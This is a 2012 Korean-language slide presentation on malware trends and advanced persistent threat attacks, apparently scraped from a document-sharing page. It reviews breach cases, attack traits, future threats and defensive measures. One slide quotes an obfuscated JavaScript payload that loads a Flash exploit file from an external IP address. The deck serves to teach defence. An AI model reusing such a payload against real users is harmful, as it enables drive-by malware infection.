31
2012 상반기 악성코드 동향과 전망 - APT 2012. 10. 10 조시행연구소장

2012년 상반기 악성코드 동향과 - ITFIND · 2012. 10. 24. · 2) 모바일(Mobile) 악성코드를 이용한 공격 모바일 기기의 휴대성으로 인해 기업 내부

  • Upload
    others

  • View
    0

  • Download
    0

Embed Size (px)

Citation preview

Page 1: 2012년 상반기 악성코드 동향과 - ITFIND · 2012. 10. 24. · 2) 모바일(Mobile) 악성코드를 이용한 공격 모바일 기기의 휴대성으로 인해 기업 내부

2012년 상반기 악성코드 동향과 전망 - APT

2012. 10. 10

조시행 연구소장

Page 2: 2012년 상반기 악성코드 동향과 - ITFIND · 2012. 10. 24. · 2) 모바일(Mobile) 악성코드를 이용한 공격 모바일 기기의 휴대성으로 인해 기업 내부

Contents 01 APT

02 최근 APT 공격 사례

03 APT 공격 형태의 특징

04 미래 APT 공격 형태

05 APT 공격 대응 방안

Page 3: 2012년 상반기 악성코드 동향과 - ITFIND · 2012. 10. 24. · 2) 모바일(Mobile) 악성코드를 이용한 공격 모바일 기기의 휴대성으로 인해 기업 내부

01 APT(Advanced Persistent Threat)

Page 4: 2012년 상반기 악성코드 동향과 - ITFIND · 2012. 10. 24. · 2) 모바일(Mobile) 악성코드를 이용한 공격 모바일 기기의 휴대성으로 인해 기업 내부

4

1) 2012년도 악성코드 동향 리뷰

2012년 1분기 악성코드 유형별 피해분포 2012년 1분기 대표 진단명 Top 20

2012년 1분기 악성코드 유형별 신&변종 분포

Page 5: 2012년 상반기 악성코드 동향과 - ITFIND · 2012. 10. 24. · 2) 모바일(Mobile) 악성코드를 이용한 공격 모바일 기기의 휴대성으로 인해 기업 내부

5

2) Trojan, 국내 vs. 해외

한국 해 외

공격대상 온라인 게임 계정정보 &

아이템 인터넷 뱅킹정보

악성코드 Onlinegamehack Zeus, SpyEye

피해규모 추산불가 [FBI] 최소 7000만 달러에서 2억 200만 달러의 피해 발생 추정

공통점 1. 악성코드 제작툴을 통해서 끊임없이 변종들을 제작 및 유포 2. 악성코드 제작툴은 블랙마켓에서 상용으로 판매 3. "Zeus Bot 소스가 인터넷에 공개"

※ 국내 vs. 해외

Page 6: 2012년 상반기 악성코드 동향과 - ITFIND · 2012. 10. 24. · 2) 모바일(Mobile) 악성코드를 이용한 공격 모바일 기기의 휴대성으로 인해 기업 내부

6

3) Onlinegamehack 요약

0

5

10

15

20

25

30

35

40

45

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31

Site 1

Site 2

Site 3

“2012년 4월 침해 사이트 통계”

Page 7: 2012년 상반기 악성코드 동향과 - ITFIND · 2012. 10. 24. · 2) 모바일(Mobile) 악성코드를 이용한 공격 모바일 기기의 휴대성으로 인해 기업 내부

7

“모리스(Morris) 웜은 Advanced Threat 이었다.”

“코드 레드(Code Red)와 님다(Nimda)는 Advanced Threat 이었다.”

1989

2001

방화벽(Firewall)이 나와서 방어할 수 있었다.

IPS가 나와서 막을 수 있었다.

2000년대 중반 “스파이웨어는 Advanced & Persistent Threat 이었다.”

안티 스파이웨어가 나와서 막을 수 있었다.

현재 “돈을 노리는 프로 해커의 타깃 공격은 Advanced & Persistent Threat 이다.”

해결책은?

4) APT 공격의 정의

Page 8: 2012년 상반기 악성코드 동향과 - ITFIND · 2012. 10. 24. · 2) 모바일(Mobile) 악성코드를 이용한 공격 모바일 기기의 휴대성으로 인해 기업 내부

8

5) APT (Advanced Persistent Threat)

APT는 2006년 무렵 미국 공군 사령부에서 사용하였던 군사 통신 용어 미국 공군 사령부에서는 미국 국방부와 통신시 확인된 특정 보안 위협 형태를 지칭 2010년 무렵 APT라는 용어가 민간 부분으로 전달 되며 의미가 확장

현재 민간 부분에서는 일반적으로 APT를 다음과 같이 정의

“다양한 보안 위협들을 양산하여 특정 대상에게 지속적으로 가하는 일련의 행위”

미국 공군 사령부와 미국 국방부 문장

Page 9: 2012년 상반기 악성코드 동향과 - ITFIND · 2012. 10. 24. · 2) 모바일(Mobile) 악성코드를 이용한 공격 모바일 기기의 휴대성으로 인해 기업 내부

9

6) APT 공격의 정의

Traditional Security Threats

단일 악성코드

감염PC에 대한 보안사고

불특정 다수

Advanced Security Threats

명확한 공격 목표

모듈화된 악성코드 추가 악성코드 업데이트

내부 주요 자원까지 접근 Long-term stealth 감염PC에 의한 전이 공격

Page 10: 2012년 상반기 악성코드 동향과 - ITFIND · 2012. 10. 24. · 2) 모바일(Mobile) 악성코드를 이용한 공격 모바일 기기의 휴대성으로 인해 기업 내부

02 최근 APT 공격 사례

Page 11: 2012년 상반기 악성코드 동향과 - ITFIND · 2012. 10. 24. · 2) 모바일(Mobile) 악성코드를 이용한 공격 모바일 기기의 휴대성으로 인해 기업 내부

11

1) N사 전산망 마비 사고

N사에서 발생한 침해 사고

2011년 4월 N사 전산망이 외부 공격으로 인한 시스템 손상으로 모든 업무 마비

외주 직원 노트북에 감염된 악성코드를 이용해 내부 시스템 침입

공격자는 P2P 프로그램으로 악성코드 유포 이후 7개월 동안 감시 후 공격 진행

P2P

프로그램

외주 직원

노트북

Attacker 내부 시스템

악성코드 유포

1

악성코드 감염

2

원격 제어 3

DB 서버의 데이터 삭제

4

Page 12: 2012년 상반기 악성코드 동향과 - ITFIND · 2012. 10. 24. · 2) 모바일(Mobile) 악성코드를 이용한 공격 모바일 기기의 휴대성으로 인해 기업 내부

12

2) S사 침해 사고

2011년 7월 S사 침해 사고로 3500만 명 고객 개인 정보 유출

무료 소프트웨어 업데이트 서버 해킹 후 정상 파일을 악성코드로 변경 후 유포

공격자는 8일만에 DB 관리자 권한 획득 후 DB 데이터를 분할 압축 후 외부 유출

S사에서 발생한 침해 사고

공격자

무료 소프트웨어 업데이트 서버

DB 서버

악성코드 유포

1

다른 피해 서버

악성코드 감염

2

DB 서버 접속

4

원격 제어 3

외부 서버로

데이터 전송 5

데이터 전송 6

Page 13: 2012년 상반기 악성코드 동향과 - ITFIND · 2012. 10. 24. · 2) 모바일(Mobile) 악성코드를 이용한 공격 모바일 기기의 휴대성으로 인해 기업 내부

13

3) 이란 원자력 발전소 스턱스넷(Stuxnet) 감염

2010년 7월 이란 원자력 발전소 시스템 파괴 목적의 스턱스넷(Stuxnet) 발견 MS 윈도우의 알려진 취약점 3개와 0-Day 취약점 2개를 악용해 유포

2011년 발견된 두큐(Duqu)와 2012년 발견된 플레임(Flame) 모두 이란 원자력 발전

소 관련 정보 수집 목적으로 유포

스턱스넷 악성코드의 감염과 동작 원리

Page 14: 2012년 상반기 악성코드 동향과 - ITFIND · 2012. 10. 24. · 2) 모바일(Mobile) 악성코드를 이용한 공격 모바일 기기의 휴대성으로 인해 기업 내부

14

4) 오퍼레이션 오로라(Operation Aurora) 침해 사고

2011년 1월 구글(Google) 기업 기밀 정보 탈취 목적의 침해 사고 발생 해당 침해 사고는 구글(Google) 외에 첨단 IT 기업 34개도 공격의 대상

공격은 MS 인터넷 익스플로러(Internet Explorer)의 0-Day 취약점 악용

이메일과 메신저로 악의적인 웹 사이트로 접속하는 링크 전달

오퍼레이션 오로라(Operation Aurora) 침해 사고

기업 내부 직원 공격자

이메일과 메신저로

웹 사이트 링크 전달

1

0-Day 취약점 악용

C&C 서버

링크 클릭으로

악성코드 감염

2

내부 시스템

원격 제어 3

내부 시스템 접근

4

Page 15: 2012년 상반기 악성코드 동향과 - ITFIND · 2012. 10. 24. · 2) 모바일(Mobile) 악성코드를 이용한 공격 모바일 기기의 휴대성으로 인해 기업 내부

03 APT 공격 형태의 특징

Page 16: 2012년 상반기 악성코드 동향과 - ITFIND · 2012. 10. 24. · 2) 모바일(Mobile) 악성코드를 이용한 공격 모바일 기기의 휴대성으로 인해 기업 내부

16

1) APT(Advanced Persistent Threat) 공격 형태의 증가

인터넷과 컴퓨터 시스템의 발달로 정부 기관 및 각 기업체에서 업무 자동화 도입 모든 업무 및 기밀 문서 역시 전자 문서와 같은 데이터 형태로 파일 서버에 보관

정치적, 경제적으로 고부가가치의 기밀 데이터 탈취 또는 파괴를 목표

공격 목적의 다양화로 APT 형태의 타깃 공격(Targeted Attack)이 과거에 비해 증가

시만텍(Symantec)에서 공개한 타깃 공격(Targeted Attack) 증가치

Page 17: 2012년 상반기 악성코드 동향과 - ITFIND · 2012. 10. 24. · 2) 모바일(Mobile) 악성코드를 이용한 공격 모바일 기기의 휴대성으로 인해 기업 내부

17

2) APT(Advanced Persistent Threat) 공격 대상의 확장

과거 APT 공격의 주된 목표는 정부 및 군사 기밀 정보 탈취임으로 정부 및 군사 기관이 주된 APT 공격의 대상

현재는 정치적, 경제적으로 고부가 가치의 데이터를 보유한 일반 기업 및 조직들 역시 APT공격의 주요 대상

• 정부 기관 기밀 문서 탈취

• 군사 기밀 문서 탈취 정부 기관

• 사이버 테러리즘 활동

• 사회 기간 산업 시스템 동작 불능

사회 기간

산업 시설

• 첨단 기술 자산 탈취

• 원천 기술 관련 기밀 탈취 정보 통신 기업

• 기업 지적 자산 탈취

• 기업 영업 비밀 탈취 제조 업종 기업

• 사회 금융 시스템의 동작 불능

• 기업 금융 자산 정보 탈취 금융 업종 기업

Page 18: 2012년 상반기 악성코드 동향과 - ITFIND · 2012. 10. 24. · 2) 모바일(Mobile) 악성코드를 이용한 공격 모바일 기기의 휴대성으로 인해 기업 내부

18

3) 고도화된 사회 공학 기법(Social Engineering) 개발과 적용

웹과 소셜 네트워크(Social Network)의 발달은 공격 대상의 개인 정보 수집 용이 수집한 개인 정보들로 공격 대상에게 최적화된 사회 공학 기법(Social Engineering)

개발 및 적용

EMC/RSA 침해 사고의 경우 내부 직원들에게 채용 정보 관련 메일로 위장

청첩장과 입사 지원서로 위장한 취약한 전자문서 파일들

Page 19: 2012년 상반기 악성코드 동향과 - ITFIND · 2012. 10. 24. · 2) 모바일(Mobile) 악성코드를 이용한 공격 모바일 기기의 휴대성으로 인해 기업 내부

19

4) 악성코드 및 취약점 관련 기술의 발전

악성코드 제작 및 취약점 개발 기술들의 발전은 보안 제품 탐지 우회와 APT 공격의 성공률을 높이는데 기여

악성코드는 셀프 업데이트(Self-Update), 보안 제품 무력화 기능 및 다수의 개별 기

능을 가진 파일들의 조합

취약점은 다양한 일반 소프트웨어의 알려진 취약점 또는 0-Day 취약점들을 악용

DarkComet RAT의 보안 기능 무력화 옵션 MS10-087 워드 취약점 악성코드 생성기

Page 20: 2012년 상반기 악성코드 동향과 - ITFIND · 2012. 10. 24. · 2) 모바일(Mobile) 악성코드를 이용한 공격 모바일 기기의 휴대성으로 인해 기업 내부

20

5) APT(Advanced Persistent Threat) 공격 기법의 다변화

현재까지 APT 공격의 주요 공격 기법은 이메일의 첨부 파일을 이용하는 형태 과거 첨부 파일이 실행 가능한 파일이었으나 최근에는 전자문서 형태로 변경

한국의 경우 무료 소프트웨어의 자동 업데이트 기능과 한국산 P2P 프로그램 악용

EMC/RSA 침해 사고에 사용된 이메일

Page 21: 2012년 상반기 악성코드 동향과 - ITFIND · 2012. 10. 24. · 2) 모바일(Mobile) 악성코드를 이용한 공격 모바일 기기의 휴대성으로 인해 기업 내부

04 미래 APT 공격 형태

Page 22: 2012년 상반기 악성코드 동향과 - ITFIND · 2012. 10. 24. · 2) 모바일(Mobile) 악성코드를 이용한 공격 모바일 기기의 휴대성으로 인해 기업 내부

22

1) 국지적인 일반 소프트웨어의 취약점 악용

APT 공격은 공격 대상이 속한 국가에서 사용 빈도가 높은 소프트웨어 취약점 악용

한국의 한글 소프트웨어, 곰 플레이어와 일본의 이치타로(Ichitaro) 취약점 악용 사회 공학 기법(Social Engineering) 역시 해당 국가의 문화나 사회적 이슈를 악용

한글 소프트웨어의 0-Day 취약점 악용 이치타로(Ichitaro)의 0-Day 취약점 악용

Source : Symantec

Page 23: 2012년 상반기 악성코드 동향과 - ITFIND · 2012. 10. 24. · 2) 모바일(Mobile) 악성코드를 이용한 공격 모바일 기기의 휴대성으로 인해 기업 내부

23

2) 모바일(Mobile) 악성코드를 이용한 공격

모바일 기기의 휴대성으로 인해 기업 내부 반, 출입이 용이함

2012년 2월 안드로이드 앱(Android App) 내부에 윈도우 스크립트(Script) 악성코드 포함 사례 발견

2012년 3월 스마트폰으로 수신된 SMS의 피싱(Phishing) 웹 사이트 URL

안드로이드 앱(Android App) 내부의 윈도우 스크립트(Script) 악성코드 SMS로 전달된 URL

Page 24: 2012년 상반기 악성코드 동향과 - ITFIND · 2012. 10. 24. · 2) 모바일(Mobile) 악성코드를 이용한 공격 모바일 기기의 휴대성으로 인해 기업 내부

24

3) 보안 제품의 탐지 우회 기법 개발과 적용

APT 공격에 대응하기 위한 보안 제품들의 탐지 우회를 위한 악성코드 제작 2012년 5월 어도비 플래시(Adobe Flash) CVE-2012-0779 취약점 악용한 워드

(Word) 파일은 취약점 코드 없이 단순 다운로더(Downloader) 역할만 수행

2012년 6월 스팸메일(SpamMail)은 웹 익스플로잇 툴킷(Web Exploit Toolkit)과 결합으로 공격의 다변화

javascript:eval(document.write(unescape('%3

Cembed%20src%3Dhttp://178.XX.XX.208/read

me.swf?info=789c3334b7d03337d73333d3333

2b0b032313106001f0e0374&infosize=0042000

0%3E%3C/embed%3E')))

워드 파일 내부의 취약한 플래쉬 파일 다운로드 코드 스팸메일과 웹 익스플로잇 툴 킷의 결합

Page 25: 2012년 상반기 악성코드 동향과 - ITFIND · 2012. 10. 24. · 2) 모바일(Mobile) 악성코드를 이용한 공격 모바일 기기의 휴대성으로 인해 기업 내부

05 APT 공격 대응 방안

Page 26: 2012년 상반기 악성코드 동향과 - ITFIND · 2012. 10. 24. · 2) 모바일(Mobile) 악성코드를 이용한 공격 모바일 기기의 휴대성으로 인해 기업 내부

26

1. 보안패치 빠짐없이 설치!!!

1) 예방 – 윈도우 보안패치

Page 27: 2012년 상반기 악성코드 동향과 - ITFIND · 2012. 10. 24. · 2) 모바일(Mobile) 악성코드를 이용한 공격 모바일 기기의 휴대성으로 인해 기업 내부

27

2. 응용 프로그램 패치 설치!!!

2) 예방 – 응용 프로그램 패치

Page 28: 2012년 상반기 악성코드 동향과 - ITFIND · 2012. 10. 24. · 2) 모바일(Mobile) 악성코드를 이용한 공격 모바일 기기의 휴대성으로 인해 기업 내부

28

3. 보안관련 정보 모니터링 !!!

3) 예방 – 보안 정보 모니터링

Page 29: 2012년 상반기 악성코드 동향과 - ITFIND · 2012. 10. 24. · 2) 모바일(Mobile) 악성코드를 이용한 공격 모바일 기기의 휴대성으로 인해 기업 내부

29

4) APT공격 대응 방안

보안 위협의 급속한 발전에 대응하기 위해 기업에 적합한 보안 정책 수립 필요 단일 보안 장비와 소프트웨어에 의존보다는 다각적 Defense in Depth 전략 필요

새로운 보안 위협에 신속한 대비와 대응을 위해서는 Security Intelligence 필요

보안 위협의 시작점이 내부 직원임으로 주기적인 보안 인식 교육 제공 필요

APT 공격에 대응하기 위한 보안 전략

Page 30: 2012년 상반기 악성코드 동향과 - ITFIND · 2012. 10. 24. · 2) 모바일(Mobile) 악성코드를 이용한 공격 모바일 기기의 휴대성으로 인해 기업 내부

30

사내 모든 파일의 움직임에 대한 ‘가시성’ 확보와 ‘실시간 행위 분석’ - 네트워크 관제와 내부 관제가 통합된 Convergence 관제 요구 - 클라우드 기반의 보안 기술 연구

5) APT공격 대응 방안 - 기술

Page 31: 2012년 상반기 악성코드 동향과 - ITFIND · 2012. 10. 24. · 2) 모바일(Mobile) 악성코드를 이용한 공격 모바일 기기의 휴대성으로 인해 기업 내부

thank you. 2012년 상반기 악성코드 동향과 전망 - APT